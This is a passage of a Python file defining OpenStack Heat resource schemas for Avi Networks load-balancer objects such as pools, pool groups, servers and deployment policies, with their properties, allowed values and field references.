'backup_pool': backup_pool_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'redirect': getattr(FailActionHTTPRedirect, 'field_references', {}),
'backup_pool': getattr(FailActionBackupPool, 'field_references', {}),
'local_rsp': getattr(FailActionHTTPLocalResponse, 'field_references', {}),
}
unique_keys = {
'redirect': getattr(FailActionHTTPRedirect, 'unique_keys', {}),
'backup_pool': getattr(FailActionBackupPool, 'unique_keys', {}),
'local_rsp': getattr(FailActionHTTPLocalResponse, 'unique_keys', {}),
}
class PoolGroupDeploymentPolicy(AviResource):
resource_name = "poolgroupdeploymentpolicy"
# all schemas
avi_version_schema = properties.Schema(
properties.Schema.STRING,
_("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
required=False,
update_allowed=True,
)
name_schema = properties.Schema(
properties.Schema.STRING,
_("The name of the pool group deployment policy"),
required=True,
update_allowed=True,
)
scheme_schema = properties.Schema(
properties.Schema.STRING,
_("deployment scheme (Default: BLUE_GREEN)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['BLUE_GREEN', 'CANARY']),
],
)
test_traffic_ratio_rampup_schema = properties.Schema(
properties.Schema.NUMBER,
_("Ratio of the traffic that is sent to the pool under test. test ratio of 100 means blue green (Default: 100)"),
required=False,
update_allowed=True,
)
rules_item_schema = properties.Schema(
properties.Schema.MAP,
_(""),
schema=PGDeploymentRule.properties_schema,
required=True,
update_allowed=False,
)
rules_schema = properties.Schema(
properties.Schema.LIST,
_(""),
schema=rules_item_schema,
required=False,
update_allowed=True,
)
webhook_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("(Introduced in: 17.1.1) Webhook configured with URL that Avi controller will pass back information about pool group, old and new pool information and current deployment rule results"),
required=False,
update_allowed=True,
)
evaluation_duration_schema = properties.Schema(
properties.Schema.NUMBER,
_("Duration of evaluation period for automatic deployment (Units: SEC) (Default: 300)"),
required=False,
update_allowed=True,
)
target_test_traffic_ratio_schema = properties.Schema(
properties.Schema.NUMBER,
_("Target traffic ratio before pool is made production (Units: RATIO) (Default: 100)"),
required=False,
update_allowed=True,
)
auto_disable_old_prod_pools_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("It will automatically disable old production pools once there is a new production candidate (Default: True)"),
required=False,
update_allowed=True,
)
description_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'avi_version',
'name',
'scheme',
'test_traffic_ratio_rampup',
'rules',
'webhook_uuid',
'evaluation_duration',
'target_test_traffic_ratio',
'auto_disable_old_prod_pools',
'description',
)
# mapping of properties to their schemas
properties_schema = {
'avi_version': avi_version_schema,
'name': name_schema,
'scheme': scheme_schema,
'test_traffic_ratio_rampup': test_traffic_ratio_rampup_schema,
'rules': rules_schema,
'webhook_uuid': webhook_uuid_schema,
'evaluation_duration': evaluation_duration_schema,
'target_test_traffic_ratio': target_test_traffic_ratio_schema,
'auto_disable_old_prod_pools': auto_disable_old_prod_pools_schema,
'description': description_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'rules': getattr(PGDeploymentRule, 'field_references', {}),
}
unique_keys = {
'rules': getattr(PGDeploymentRule, 'unique_keys', {}),
}
class NetworkFilter(object):
# all schemas
network_uuid_schema = properties.Schema(
properties.Schema.STRING,
_(" You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=True,
update_allowed=True,
)
server_filter_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'network_uuid',
'server_filter',
)
# mapping of properties to their schemas
properties_schema = {
'network_uuid': network_uuid_schema,
'server_filter': server_filter_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'network_uuid': 'vimgrnwruntime',
}
class HTTPReselectRespCode(object):
# all schemas
codes_item_schema = properties.Schema(
properties.Schema.NUMBER,
_("HTTP response code to be matched."),
required=True,
update_allowed=False,
)
codes_schema = properties.Schema(
properties.Schema.LIST,
_("HTTP response code to be matched."),
schema=codes_item_schema,
required=False,
update_allowed=True,
)
ranges_item_schema = properties.Schema(
properties.Schema.MAP,
_("HTTP response code ranges to match."),
schema=HTTPStatusRange.properties_schema,
required=True,
update_allowed=False,
)
ranges_schema = properties.Schema(
properties.Schema.LIST,
_("HTTP response code ranges to match."),
schema=ranges_item_schema,
required=False,
update_allowed=True,
)
resp_code_block_item_schema = properties.Schema(
properties.Schema.STRING,
_("Block of HTTP response codes to match for server reselect."),
required=True,
update_allowed=False,
constraints=[
constraints.AllowedValues(['HTTP_RSP_4XX', 'HTTP_RSP_5XX']),
],
)
resp_code_block_schema = properties.Schema(
properties.Schema.LIST,
_("Block of HTTP response codes to match for server reselect."),
schema=resp_code_block_item_schema,
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'codes',
'ranges',
'resp_code_block',
)
# mapping of properties to their schemas
properties_schema = {
'codes': codes_schema,
'ranges': ranges_schema,
'resp_code_block': resp_code_block_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'ranges': getattr(HTTPStatusRange, 'field_references', {}),
}
unique_keys = {
'ranges': getattr(HTTPStatusRange, 'unique_keys', {}),
}
class PoolGroup(AviResource):
resource_name = "poolgroup"
# all schemas
avi_version_schema = properties.Schema(
properties.Schema.STRING,
_("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
required=False,
update_allowed=True,
)
name_schema = properties.Schema(
properties.Schema.STRING,
_("The name of the pool group."),
required=True,
update_allowed=True,
)
members_item_schema = properties.Schema(
properties.Schema.MAP,
_("List of pool group members object of type PoolGroupMember."),
schema=PoolGroupMember.properties_schema,
required=True,
update_allowed=False,
)
members_schema = properties.Schema(
properties.Schema.LIST,
_("List of pool group members object of type PoolGroupMember."),
schema=members_item_schema,
required=False,
update_allowed=True,
)
priority_labels_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("UUID of the priority labels. If not provided, pool group member priority label will be interpreted as a number with a larger number considered higher priority. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
min_servers_schema = properties.Schema(
properties.Schema.NUMBER,
_("The minimum number of servers to distribute traffic to. (Default: 0)"),
required=False,
update_allowed=True,
)
deployment_policy_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("When setup autoscale manager will automatically promote new pools into production when deployment goals are met."),
required=False,
update_allowed=True,
)
fail_action_schema = properties.Schema(
properties.Schema.MAP,
_("Enable an action - Close Connection, HTTP Redirect, or Local HTTP Response - when a pool group failure happens. By default, a connection will be closed, in case the pool group experiences a failure."),
schema=FailAction.properties_schema,
required=False,
update_allowed=True,
)
implicit_priority_labels_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("(Introduced in: 17.1.9,17.2.3) Whether an implicit set of priority labels is generated. (Default: False)"),
required=False,
update_allowed=True,
)
created_by_schema = properties.Schema(
properties.Schema.STRING,
_("Name of the user who created the object."),
required=False,
update_allowed=True,
)
cloud_config_cksum_schema = properties.Schema(
properties.Schema.STRING,
_("Checksum of cloud configuration for PoolGroup. Internally set by cloud connector"),
required=False,
update_allowed=True,
)
description_schema = properties.Schema(
properties.Schema.STRING,
_("Description of Pool Group."),
required=False,
update_allowed=True,
)
cloud_uuid_schema = properties.Schema(
properties.Schema.STRING,
_(""),
required=False,
update_allowed=False,
)
# properties list
PROPERTIES = (
'avi_version',
'name',
'members',
'priority_labels_uuid',
'min_servers',
'deployment_policy_uuid',
'fail_action',
'implicit_priority_labels',
'created_by',
'cloud_config_cksum',
'description',
'cloud_uuid',
)
# mapping of properties to their schemas
properties_schema = {
'avi_version': avi_version_schema,
'name': name_schema,
'members': members_schema,
'priority_labels_uuid': priority_labels_uuid_schema,
'min_servers': min_servers_schema,
'deployment_policy_uuid': deployment_policy_uuid_schema,
'fail_action': fail_action_schema,
'implicit_priority_labels': implicit_priority_labels_schema,
'created_by': created_by_schema,
'cloud_config_cksum': cloud_config_cksum_schema,
'description': description_schema,
'cloud_uuid': cloud_uuid_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'priority_labels_uuid': 'prioritylabels',
'fail_action': getattr(FailAction, 'field_references', {}),
'members': getattr(PoolGroupMember, 'field_references', {}),
}
unique_keys = {
'fail_action': getattr(FailAction, 'unique_keys', {}),
'members': getattr(PoolGroupMember, 'unique_keys', {}),
}
class HTTPServerReselect(object):
# all schemas
enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Enable HTTP request reselect when server responds with specific response codes. (Default: False)"),
required=True,
update_allowed=True,
)
svr_resp_code_schema = properties.Schema(
properties.Schema.MAP,
_("Server response codes which will trigger an HTTP request retry."),
schema=HTTPReselectRespCode.properties_schema,
required=False,
update_allowed=True,
)
num_retries_schema = properties.Schema(
properties.Schema.NUMBER,
_("Number of times to retry an HTTP request when server responds with configured status codes. (Default: 4)"),
required=False,
update_allowed=True,
)
retry_nonidempotent_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Allow retry of non-idempotent HTTP requests. (Default: False)"),
required=False,
update_allowed=True,
)
# properties list
PROPERTIES = (
'enabled',
'svr_resp_code',
'num_retries',
'retry_nonidempotent',
)
# mapping of properties to their schemas
properties_schema = {
'enabled': enabled_schema,
'svr_resp_code': svr_resp_code_schema,
'num_retries': num_retries_schema,
'retry_nonidempotent': retry_nonidempotent_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'svr_resp_code': getattr(HTTPReselectRespCode, 'field_references', {}),
}
unique_keys = {
'svr_resp_code': getattr(HTTPReselectRespCode, 'unique_keys', {}),
}
class Server(object):
# all schemas
ip_schema = properties.Schema(
properties.Schema.MAP,
_("IP Address of the server. Required if there is no resolvable host name."),
schema=IpAddr.properties_schema,
required=True,
update_allowed=True,
)
port_schema = properties.Schema(
properties.Schema.NUMBER,
_("Optionally specify the servers port number. This will override the pool's default server port attribute."),
required=False,
update_allowed=True,
)
hostname_schema = properties.Schema(
properties.Schema.STRING,
_("DNS resolvable name of the server. May be used in place of the IP address."),
required=False,
update_allowed=True,
)
enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Enable, Disable or Graceful Disable determine if new or existing connections to the server are allowed. (Default: True)"),
required=False,
update_allowed=True,
)
ratio_schema = properties.Schema(
properties.Schema.NUMBER,
_("Ratio of selecting eligible servers in the pool (Default: 1)"),
required=False,
update_allowed=True,
)
vm_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("(internal-use) This field is used internally by Avi, not editable by the user. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
nw_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("(internal-use) This field is used internally by Avi, not editable by the user. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
discovered_network_uuid_item_schema = properties.Schema(
properties.Schema.STRING,
_("(Deprecated in: 17.1.1) (internal-use) Discovered network for this server. This field is deprecated."),
required=True,
update_allowed=False,
)
discovered_network_uuid_schema = properties.Schema(
properties.Schema.LIST,
_("(Deprecated in: 17.1.1) (internal-use) Discovered network for this server. This field is deprecated. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
schema=discovered_network_uuid_item_schema,
required=False,
update_allowed=True,
)
external_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("UUID identifying VM in OpenStack and other external compute"),
required=False,
update_allowed=True,
)
discovered_subnet_item_schema = properties.Schema(
properties.Schema.MAP,
_("(Deprecated in: 17.1.1) (internal-use) Discovered subnet for this server. This field is deprecated."),
schema=IpAddrPrefix.properties_schema,
required=True,
update_allowed=False,
)
discovered_subnet_schema = properties.Schema(
properties.Schema.LIST,
_("(Deprecated in: 17.1.1) (internal-use) Discovered subnet for this server. This field is deprecated."),
schema=discovered_subnet_item_schema,
required=False,
update_allowed=True,
)
verify_network_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Verify server belongs to a discovered network or reachable via a discovered network. Verify reachable network isn't the OpenStack management network (Default: False)"),
required=False,
update_allowed=True,
)
discovered_networks_item_schema = properties.Schema(
properties.Schema.MAP,
_("(internal-use) Discovered networks providing reachability for server IP. This field is used internally by Avi, not editable by the user."),
schema=DiscoveredNetwork.properties_schema,
required=True,
update_allowed=False,
)
discovered_networks_schema = properties.Schema(
properties.Schema.LIST,
_("(internal-use) Discovered networks providing reachability for server IP. This field is used internally by Avi, not editable by the user."),
schema=discovered_networks_item_schema,
required=False,
update_allowed=True,
)
resolve_server_by_dns_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Auto resolve server's IP using DNS name (Default: False)"),
required=False,
update_allowed=True,
)
prst_hdr_val_schema = properties.Schema(
properties.Schema.STRING,
_("Header value for custom header persistence. "),
required=False,
update_allowed=True,
)
mac_address_schema = properties.Schema(
properties.Schema.STRING,
_("MAC address of server."),
required=False,
update_allowed=True,
)
static_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("If statically learned. (Default: False)"),
required=False,
update_allowed=True,
)
server_node_schema = properties.Schema(
properties.Schema.STRING,
_("Hostname of the node where the server VM or container resides"),
required=False,
update_allowed=True,
)
availability_zone_schema = properties.Schema(
properties.Schema.STRING,
_("Availability-zone of the server VM."),
required=False,
update_allowed=True,
)
rewrite_host_header_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Rewrite incoming Host Header to server name. (Default: False)"),
required=False,
update_allowed=True,
)
external_orchestration_id_schema = properties.Schema(
properties.Schema.STRING,
_("UID of server in external orchestration systems"),
required=False,
update_allowed=True,
)
description_schema = properties.Schema(
properties.Schema.STRING,
_("A description of the Server."),
required=False,
update_allowed=True,
)
location_schema = properties.Schema(
properties.Schema.MAP,
_("(Introduced in: 17.1.1) (internal-use) Geographic location of the server.Currently only for internal usage."),
schema=GeoLocation.properties_schema,
required=False,
update_allowed=False,
)
autoscaling_group_name_schema = properties.Schema(
properties.Schema.STRING,
_("(Introduced in: 17.1.2) Name of autoscaling group this server belongs to."),
required=False,
update_allowed=False,
)
# properties list
PROPERTIES = (
'ip',
'port',
'hostname',
'enabled',
'ratio',
'vm_uuid',
'nw_uuid',
'discovered_network_uuid',
'external_uuid',
'discovered_subnet',
'verify_network',
'discovered_networks',
'resolve_server_by_dns',
'prst_hdr_val',
'mac_address',
'static',
'server_node',
'availability_zone',
'rewrite_host_header',
'external_orchestration_id',
'description',
'location',
'autoscaling_group_name',
)
# mapping of properties to their schemas
properties_schema = {
'ip': ip_schema,
'port': port_schema,
'hostname': hostname_schema,
'enabled': enabled_schema,
'ratio': ratio_schema,
'vm_uuid': vm_uuid_schema,
'nw_uuid': nw_uuid_schema,
'discovered_network_uuid': discovered_network_uuid_schema,
'external_uuid': external_uuid_schema,
'discovered_subnet': discovered_subnet_schema,
'verify_network': verify_network_schema,
'discovered_networks': discovered_networks_schema,
'resolve_server_by_dns': resolve_server_by_dns_schema,
'prst_hdr_val': prst_hdr_val_schema,
'mac_address': mac_address_schema,
'static': static_schema,
'server_node': server_node_schema,
'availability_zone': availability_zone_schema,
'rewrite_host_header': rewrite_host_header_schema,
'external_orchestration_id': external_orchestration_id_schema,
'description': description_schema,
'location': location_schema,
'autoscaling_group_name': autoscaling_group_name_schema,
}
# for supporting get_avi_uuid_by_name functionality
field_references = {
'ip': getattr(IpAddr, 'field_references', {}),
'discovered_networks': getattr(DiscoveredNetwork, 'field_references', {}),
'discovered_subnet': getattr(IpAddrPrefix, 'field_references', {}),
'vm_uuid': 'vimgrvmruntime',
'location': getattr(GeoLocation, 'field_references', {}),
'discovered_network_uuid': 'network',
'nw_uuid': 'vimgrnwruntime',
}
unique_keys = {
'ip': getattr(IpAddr, 'unique_keys', {}),
'discovered_networks': getattr(DiscoveredNetwork, 'unique_keys', {}),
'my_key': 'ip,port',
'location': getattr(GeoLocation, 'unique_keys', {}),
'discovered_subnet': getattr(IpAddrPrefix, 'unique_keys', {}),
}
class Pool(AviResource):
resource_name = "pool"
# all schemas
avi_version_schema = properties.Schema(
properties.Schema.STRING,
_("Avi Version to use for the object. Default is 16.4.2. If you plan to use any fields introduced after 16.4.2, then this needs to be explicitly set."),
required=False,
update_allowed=True,
)
name_schema = properties.Schema(
properties.Schema.STRING,
_("The name of the pool."),
required=True,
update_allowed=True,
)
default_server_port_schema = properties.Schema(
properties.Schema.NUMBER,
_("Traffic sent to servers will use this destination server port unless overridden by the server's specific port attribute. The SSL checkbox enables Avi to server encryption. (Default: 80)"),
required=False,
update_allowed=True,
)
graceful_disable_timeout_schema = properties.Schema(
properties.Schema.NUMBER,
_("Used to gracefully disable a server. Virtual service waits for the specified time before terminating the existing connections to the servers that are disabled. (Units: MIN) (Default: 1)"),
required=False,
update_allowed=True,
)
connection_ramp_duration_schema = properties.Schema(
properties.Schema.NUMBER,
_("Duration for which new connections will be gradually ramped up to a server recently brought online. Useful for LB algorithms that are least connection based. (Units: MIN) (Default: 10)"),
required=False,
update_allowed=True,
)
max_concurrent_connections_per_server_schema = properties.Schema(
properties.Schema.NUMBER,
_("The maximum number of concurrent connections allowed to each server within the pool. NOTE: applied value will be no less than the number of service engines that the pool is placed on. If set to 0, no limit is applied. (Default: 0)"),
required=False,
update_allowed=True,
)
health_monitor_uuids_item_schema = properties.Schema(
properties.Schema.STRING,
_("Verify server health by applying one or more health monitors. Active monitors generate synthetic traffic from each Service Engine and mark a server up or down based on the response. The Passive monitor listens only to client to server communication. It raises or lowers the ratio of traffic destined to a server based on successful responses."),
required=True,
update_allowed=False,
)
health_monitor_uuids_schema = properties.Schema(
properties.Schema.LIST,
_("Verify server health by applying one or more health monitors. Active monitors generate synthetic traffic from each Service Engine and mark a server up or down based on the response. The Passive monitor listens only to client to server communication. It raises or lowers the ratio of traffic destined to a server based on successful responses. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
schema=health_monitor_uuids_item_schema,
required=False,
update_allowed=True,
)
servers_item_schema = properties.Schema(
properties.Schema.MAP,
_("The pool directs load balanced traffic to this list of destination servers. The servers can be configured by IP address, name, network or via IP Address Group"),
schema=Server.properties_schema,
required=True,
update_allowed=False,
)
servers_schema = properties.Schema(
properties.Schema.LIST,
_("The pool directs load balanced traffic to this list of destination servers. The servers can be configured by IP address, name, network or via IP Address Group"),
schema=servers_item_schema,
required=False,
update_allowed=True,
)
server_count_schema = properties.Schema(
properties.Schema.NUMBER,
_(" (Default: 0)"),
required=False,
update_allowed=True,
)
lb_algorithm_schema = properties.Schema(
properties.Schema.STRING,
_("The load balancing algorithm will pick a server within the pool's list of available servers. (Default: LB_ALGORITHM_LEAST_CONNECTIONS)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['LB_ALGORITHM_CONSISTENT_HASH', 'LB_ALGORITHM_CORE_AFFINITY', 'LB_ALGORITHM_FASTEST_RESPONSE', 'LB_ALGORITHM_FEWEST_SERVERS', 'LB_ALGORITHM_FEWEST_TASKS', 'LB_ALGORITHM_LEAST_CONNECTIONS', 'LB_ALGORITHM_LEAST_LOAD', 'LB_ALGORITHM_NEAREST_SERVER', 'LB_ALGORITHM_RANDOM', 'LB_ALGORITHM_ROUND_ROBIN']),
],
)
lb_algorithm_hash_schema = properties.Schema(
properties.Schema.STRING,
_("Criteria used as a key for determining the hash between the client and server. (Default: LB_ALGORITHM_CONSISTENT_HASH_SOURCE_IP_ADDRESS)"),
required=False,
update_allowed=True,
constraints=[
constraints.AllowedValues(['LB_ALGORITHM_CONSISTENT_HASH_CALLID', 'LB_ALGORITHM_CONSISTENT_HASH_CUSTOM_HEADER', 'LB_ALGORITHM_CONSISTENT_HASH_CUSTOM_STRING', 'LB_ALGORITHM_CONSISTENT_HASH_SOURCE_IP_ADDRESS', 'LB_ALGORITHM_CONSISTENT_HASH_SOURCE_IP_ADDRESS_AND_PORT', 'LB_ALGORITHM_CONSISTENT_HASH_URI']),
],
)
lb_algorithm_consistent_hash_hdr_schema = properties.Schema(
properties.Schema.STRING,
_("HTTP header name to be used for the hash key."),
required=False,
update_allowed=True,
)
networks_item_schema = properties.Schema(
properties.Schema.MAP,
_("(internal-use) Networks designated as containing servers for this pool. The servers may be further narrowed down by a filter. This field is used internally by Avi, not editable by the user."),
schema=NetworkFilter.properties_schema,
required=True,
update_allowed=False,
)
networks_schema = properties.Schema(
properties.Schema.LIST,
_("(internal-use) Networks designated as containing servers for this pool. The servers may be further narrowed down by a filter. This field is used internally by Avi, not editable by the user."),
schema=networks_item_schema,
required=False,
update_allowed=True,
)
placement_networks_item_schema = properties.Schema(
properties.Schema.MAP,
_("Manually select the networks and subnets used to provide reachability to the pool's servers. Specify the Subnet using the following syntax: 10-1-1-0/24. Use static routes in VRF configuration when pool servers are not directly connected butroutable from the service engine."),
schema=PlacementNetwork.properties_schema,
required=True,
update_allowed=False,
)
placement_networks_schema = properties.Schema(
properties.Schema.LIST,
_("Manually select the networks and subnets used to provide reachability to the pool's servers. Specify the Subnet using the following syntax: 10-1-1-0/24. Use static routes in VRF configuration when pool servers are not directly connected butroutable from the service engine."),
schema=placement_networks_item_schema,
required=False,
update_allowed=True,
)
application_persistence_profile_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Persistence will ensure the same user sticks to the same server for a desired duration of time. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
ssl_profile_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("When enabled, Avi re-encrypts traffic to the backend servers. The specific SSL profile defines which ciphers and SSL versions will be supported. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
inline_health_monitor_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("The Passive monitor will monitor client to server connections and requests and adjust traffic load to servers based on successful responses. This may alter the expected behavior of the LB method, such as Round Robin. (Default: True)"),
required=False,
update_allowed=True,
)
use_service_port_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Do not translate the client's destination port when sending the connection to the server. The pool or servers specified service port will still be used for health monitoring. (Default: False)"),
required=False,
update_allowed=True,
)
fail_action_schema = properties.Schema(
properties.Schema.MAP,
_("Enable an action - Close Connection, HTTP Redirect or Local HTTP Response - when a pool failure happens. By default, a connection will be closed, in case the pool experiences a failure."),
schema=FailAction.properties_schema,
required=False,
update_allowed=True,
)
capacity_estimation_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Inline estimation of capacity of servers. (Default: False)"),
required=False,
update_allowed=True,
)
capacity_estimation_ttfb_thresh_schema = properties.Schema(
properties.Schema.NUMBER,
_("The maximum time-to-first-byte of a server. (Units: MILLISECONDS) (Default: 0)"),
required=False,
update_allowed=True,
)
pki_profile_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Avi will validate the SSL certificate present by a server against the selected PKI Profile. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
ssl_key_and_certificate_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Service Engines will present a client SSL certificate to the server. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
server_auto_scale_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Server AutoScale. Not used anymore. (Default: False)"),
required=False,
update_allowed=True,
)
prst_hdr_name_schema = properties.Schema(
properties.Schema.STRING,
_("Header name for custom header persistence"),
required=False,
update_allowed=True,
)
apic_epg_name_schema = properties.Schema(
properties.Schema.STRING,
_("Synchronize Cisco APIC EPG members with pool servers"),
required=False,
update_allowed=True,
)
autoscale_networks_item_schema = properties.Schema(
properties.Schema.STRING,
_("Network Ids for the launch configuration"),
required=True,
update_allowed=False,
)
autoscale_networks_schema = properties.Schema(
properties.Schema.LIST,
_("Network Ids for the launch configuration"),
schema=autoscale_networks_item_schema,
required=False,
update_allowed=True,
)
autoscale_policy_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Reference to Server Autoscale Policy You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
autoscale_launch_config_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("If configured then Avi will trigger orchestration of pool server creation and deletion. It is only supported for container clouds like Mesos, Opensift, Kubernates, Docker etc. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
vrf_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Virtual Routing Context that the pool is bound to. This is used to provide the isolation of the set of networks the pool is attached to. The pool inherits the Virtual Routing Conext of the Virtual Service, and this field is used only internally, and is set by pb-transform. You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=False,
)
ipaddrgroup_uuid_schema = properties.Schema(
properties.Schema.STRING,
_("Use list of servers from Ip Address Group You can either provide UUID or provide a name with the prefix 'get_avi_uuid_by_name:', e.g., 'get_avi_uuid_by_name:my_obj_name'."),
required=False,
update_allowed=True,
)
fewest_tasks_feedback_delay_schema = properties.Schema(
properties.Schema.NUMBER,
_("Periodicity of feedback for fewest tasks server selection algorithm. (Units: SEC) (Default: 10)"),
required=False,
update_allowed=True,
)
enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Enable or disable the pool. Disabling will terminate all open connections and pause health monitors. (Default: True)"),
required=False,
update_allowed=True,
)
max_conn_rate_per_server_schema = properties.Schema(
properties.Schema.MAP,
_("Rate Limit connections to each server."),
schema=RateProfile.properties_schema,
required=False,
update_allowed=True,
)
east_west_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Inherited config from VirtualService."),
required=False,
update_allowed=True,
)
created_by_schema = properties.Schema(
properties.Schema.STRING,
_("Creator name"),
required=False,
update_allowed=True,
)
cloud_config_cksum_schema = properties.Schema(
properties.Schema.STRING,
_("Checksum of cloud configuration for Pool. Internally set by cloud connector"),
required=False,
update_allowed=True,
)
request_queue_enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Enable request queue when pool is full (Default: False)"),
required=False,
update_allowed=True,
)
request_queue_depth_schema = properties.Schema(
properties.Schema.NUMBER,
_("Minimum number of requests to be queued when pool is full. (Default: 128)"),
required=False,
update_allowed=True,
)
ab_pool_schema = properties.Schema(
properties.Schema.MAP,
_("(Deprecated in: 18.1.2) A/B pool configuration."),
schema=AbPool.properties_schema,
required=False,
update_allowed=True,
)
server_reselect_schema = properties.Schema(
properties.Schema.MAP,
_("Server reselect configuration for HTTP requests."),
schema=HTTPServerReselect.properties_schema,
required=False,
update_allowed=True,
)
a_pool_schema = properties.Schema(
properties.Schema.STRING,
_("(Deprecated in: 18.1.2) Name of container cloud application that constitutes A pool in a A-B pool configuration, if different from VS app"),
required=False,
update_allowed=True,
)
ab_priority_schema = properties.Schema(
properties.Schema.NUMBER,
_("(Deprecated in: 18.1.2) Priority of this pool in a A-B pool pair. Internally used"),
required=False,
update_allowed=True,
)
host_check_enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Enable common name check for server certificate. If enabled and no explicit domain name is specified, Avi will use the incoming host header to do the match. (Default: False)"),
required=False,
update_allowed=True,
)
domain_name_item_schema = properties.Schema(
properties.Schema.STRING,
_("Comma separated list of domain names which will be used to verify the common names or subject alternative names presented by server certificates. It is performed only when common name check host_check_enabled is enabled."),
required=True,
update_allowed=False,
)
domain_name_schema = properties.Schema(
properties.Schema.LIST,
_("Comma separated list of domain names which will be used to verify the common names or subject alternative names presented by server certificates. It is performed only when common name check host_check_enabled is enabled."),
schema=domain_name_item_schema,
required=False,
update_allowed=True,
)
sni_enabled_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Enable TLS SNI for server connections. If disabled, Avi will not send the SNI extension as part of the handshake. (Default: True)"),
required=False,
update_allowed=True,
)
server_name_schema = properties.Schema(
properties.Schema.STRING,
_("Fully qualified DNS hostname which will be used in the TLS SNI extension in server connections if SNI is enabled. If no value is specified, Avi will use the incoming host header instead."),
required=False,
update_allowed=True,
)
rewrite_host_header_to_sni_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("If SNI server name is specified, rewrite incoming host header to the SNI server name. (Default: False)"),
required=False,
update_allowed=True,
)
rewrite_host_header_to_server_name_schema = properties.Schema(
properties.Schema.BOOLEAN,
_("Rewrite incoming Host Header to server name of the server to which the request is proxied. Enabling this feature rewrites Host Header for requests to all servers in the pool. (Default: False)"),
required=False,
update_allowed=True,
)
nsx_securitygroup_item_schema = properties.Schema(
properties.Schema.STRING,
_("(Introduced in: 17.1.1) A list of NSX Service Groups where the Servers for the Pool are created "),
required=True,
update_allowed=False,
)
nsx_securitygroup_schema = properties.Schema(
properties.Schema.LIST,
_("(Introduced in: 17.1.1) A list of NSX Service Groups where the Servers for the Pool are created "),
schema=nsx_securitygroup_item_schema,
required=False,
update_allowed=True,
)
external_autoscale_groups_item_schema = properties.Schema(
properties.Schema.STRING,
_("(Introduced in: 17.1.2) Names of external auto-scale groups for pool servers. Currently available only for AWS and Azure"),
required=True,
update_allowed=False,
)
external_autoscale_groups_schema = properties.Schema(
